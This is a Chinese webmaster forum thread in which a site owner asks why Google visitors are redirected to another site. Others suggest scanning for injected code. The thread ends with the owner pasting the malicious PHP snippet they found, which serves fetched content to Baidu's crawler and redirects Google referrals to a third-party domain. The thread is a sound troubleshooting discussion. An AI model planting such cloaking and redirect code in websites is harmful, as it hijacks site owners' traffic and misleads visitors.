谷歌搜索结果被劫持了，怎么解决呢？

妃子笑

大家好，好久不见啦 @！
* |4 Y( p8 O8 u$ P9 i6 |+ Z9 u
我遇到一个很奇怪的问题，我的网站 www.mg21.com
0 g! A9 d0 _; ]* l& E0 T* q
2 X- R% r) |7 m  ~在谷歌的搜索结果全部被劫持到另外一个网站去，比如我 site:www.mg21.com 找到自己的网站，点进去以后，会被劫持到另外一个网站 zb128.cc
3 j( Q! o1 n5 Q3 |6 {5 r) ]0 k/ {% K
2 m) z. k+ T  o# R8 d而百度和bing等的搜索结果就不会劫持，直接访问也OK，其他地方的外链进来也OK，只有谷歌的流量进不来。
7 l' i$ _$ Q+ w% u
2 y5 X8 e, \8 `4 q我想着加个SSL，可是弄半天也没弄好，有点尴尬。
* X/ }3 s. h+ U
- Y, h! p+ L  n. t& x! K% }* W有没有遇到这个情况的？给个解决思路啊！谢谢啦！
8 t- n1 Z1 ?' b0 O2 F, W. Y/ {- Z
, Y' W* ^5 f" x( n

晕蛋疯亲

明显被黑了，查下是不是被挂JS了

妃子笑

晕蛋疯亲 发表于 2017-11-25 17:07
) K% J9 ~) W) x. N. o  `: V# j( t% j明显被黑了，查下是不是被挂JS了

我不懂查，只是在线用了360，还有几个检测挂马的工具，都没查出来。

晕蛋疯亲

妃子笑 发表于 2017-11-25 17:11
* g( i. `- o7 @+ A( V3 s我不懂查，只是在线用了360，还有几个检测挂马的工具，都没查出来。

, H: }4 y' E# |加密的怕是查不出，去FTP里面看下，有没有新增加的文件，看文件日期有没有最近修改过，如果文件日期被改过，那就只能自己手动慢慢查了，文件多挺累人的

妃子笑

晕蛋疯亲 发表于 2017-11-25 17:20
加密的怕是查不出，去FTP里面看下，有没有新增加的文件，看文件日期有没有最近修改过，如果文件日期被改 ...

- M7 d& w9 n" g( \应该不是js吧，我把所有的JS文件全部删除了，重新从wp官方下载了，再上传，还是一样呢？

ceom123

我这不会啊。我用谷歌搜索了 再点进去。正常显示，没有跳转。

妃子笑

ceom123 发表于 2017-11-25 18:10
; i6 e. P4 _0 ]6 c3 a6 Q我这不会啊。我用谷歌搜索了 再点进去。正常显示，没有跳转。

你是说你在谷歌收到我的网站，点击链接，不会跳转到其他网站吗？

那如果这样的话，是我的电脑DNS被劫持了吗？

小白龙

荔枝姐好

1198345

使用D盾查一下  

qiqinjun

这个应该是加了代码进去，一般是三个地方，第一个是网页的源代码里面，直接右键查看源代码就可以看到，第二个是程序里面加判断跳转代码，如果程序简单的话，也好找出来，第三个应该就是.htaccess文件，判断谷歌来路，然后跳转，一眼就可以看出来，你去找找这三个地方试试

wxmd

荔枝现在做啥了，还搞主机AFF吗？

c21xdx

按照10楼大佬说的来。可以把网站文件都下载到你本地的电脑上，用9楼说的 D盾 来扫描你的所有网站文件，看看有没有什么可疑代码，360什么的没用的，这只是别人偷偷在你的网站空间里偷偷添加了一个跳转文件或者就直接在你原本的某个网站文件里直接添加了一些代码用来判断来路，如果来路是谷歌搜索来的，就进行跳转到其它网站，其它来路或者没有来路（就是直接出入域名打开）就不进行跳转。如果D盾有提示出什么可疑代码，可以把那一段贴到论坛来，这里很多程序大牛可以帮你看看的。如果没提示找到什么可疑代码，你觉得合适的可以贴出来的话，如果你的网站空间是用apache的话，在网站根目录下找到10楼大佬说的.htaccess贴出来看看，如果是nginx的话，就找到vhost下的域名配置文件，如果你的网站是在VPS上的。

沐风

中国移动，四川成都。
网页被跳转了……
估计不像是运营商干的，也不是DNS污染或劫持。
而是你的网站，确实被加了JS代码。
$ L( A- H+ \( i* S7 J这和我的Cloak做的跳转一样……
. X" B8 f0 j; Q
查一下你的网页代码吧，很可能是被加到了主题文件中。

ceom123

妃子笑 发表于 2017-11-25 18:26
  G% W, N9 w1 g8 X$ r5 k) I5 s你是说你在谷歌收到我的网站，点击链接，不会跳转到其他网站吗？

那如果这样的话，是我的电脑DNS被劫持了 ...

; f6 n0 \! ^# s" y是的，我用site: 搜索你的网站，然后点击其中的一个结果。正常跳转。
, Y8 e8 M# z; m4 Y: r$ L' V, o

妃子笑

谢谢大家，用D盾查到问题了，被挂了一段代码：
" {" g$ c( r4 U( s
/ a" k2 i! n7 w2 D2 c
4 c4 `$ s3 D6 m<?php
% z+ K! R$ c: z! l5 oif (ereg("http://www.baidu.com/search/spider.htm", $_SERVER["HTTP_USER_AGENT"])) {
$file = file_get_contents('http://www。zb128。cc');
" n: J: B+ ~2 ~: decho $file;//
exit;
}
if(stristr ($_SERVER['HTTP_REFERER'],"google.com")) {
5 I' m$ f1 ^9 |% r0 n. bHeader("Location: http://www。zb128。cc");//
6 \: O) u& @7 xexit;
# F1 N0 {0 u" g' _) h7 d}